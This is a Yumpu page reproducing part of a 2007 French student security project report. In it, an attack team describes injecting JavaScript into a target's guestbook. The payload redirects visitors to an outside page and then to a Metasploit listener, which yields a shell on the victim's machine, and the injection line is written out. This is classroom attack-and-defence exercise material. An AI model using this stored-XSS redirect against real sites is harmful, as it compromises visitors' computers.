29.01.2014 Views

Objet du rapport / réunion - inetdoc.net

Objet du rapport / réunion - inetdoc.net

Objet du rapport / réunion - inetdoc.net

SHOW MORE
SHOW LESS

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

IUP STRI – M2 2007<br />

Projet Sécurité – Equipe attaque G1<br />

Conclusion<br />

Ce type d’attaque est vraiment très long à mettre en place est nécessite beaucoup de<br />

(développement|bidouillage). Parfois, il faut même de l’ingénierie sociale pour faire<br />

fonctionner ces attaques. Par contre en prenant le temps, ces attaques très ciblées peuvent<br />

être très efficaces.<br />

Le gros avantage de ces attaques, c’est que l’on n’a pas besoin d’être sur le réseau local de<br />

l’entreprise, l'Inter<strong>net</strong> suffit et contrairement au injections qui commencent à être connues :<br />

ces méthodes sont encore à la marge.<br />

Rediriger les visiteurs vers un serveur Metasploit<br />

Principe de l’attaque<br />

Le principe de l’injection de javascript est de servir de support à l’attaque Metasploit qui nous<br />

permettra d’obtenir un shell dans la machine cible<br />

Pour réaliser cette attaque, nous donnons à l’équipe « Défense » l’instruction de se<br />

connecter sur leur livre d’or à partir de leur client SP0.<br />

L’idée consiste à injecter le code javascript suivant dans le livre d’or :<br />

<br />

window.location='http://jordix.com/attack/';<br />

<br />

Ainsi, lors de l’affichage des commentaires, lorsque le livre d’or sera chargé, le navigateur<br />

client interprètera le code javascript affiché.<br />

Le navigateur sera alors redirigé vers la page 'http://jordix.com/attack/ qui contient une<br />

message comme quoi le site a été piraté. De plus il re-redirige le navigateur web vers l’IP de<br />

la machine attaquante en écoute avec metasploit pour obtenir un shell sur le PC cible.<br />

Voici un récapitulatif:<br />

On injecte le code javascript suivant dans le livre d’or<br />

Lorsque le client ciblé essaye de voir les commentaires postés sur le livre d’or, le<br />

code javascript s’exécute sur le client.<br />

Le navigateur <strong>du</strong> client est redirigé vers le site 'http://jordix.com/attack/<br />

Un message de hacking s’affiche<br />

De plus le client est redirigé vers l’IP (172.16.48.14) <strong>du</strong> PC malveillant contenant<br />

metasploit.<br />

Nous obtenons ainsi un shell sur la machine ciblée.<br />

Voici le code contenu dans la page 'http://jordix.com/attack/index.html:<br />

<br />

<br />

<br />

<br />

[ Attack Team STRI M2 G1 ]<br />

<br />

<br />

. Copyright (c) 2007 – GNU Free Documentation licence ­ Équipe Attaque G1 – M2 STRI 42

Hooray! Your file is uploaded and ready to be published.

Saved successfully!

Ooh no, something went wrong!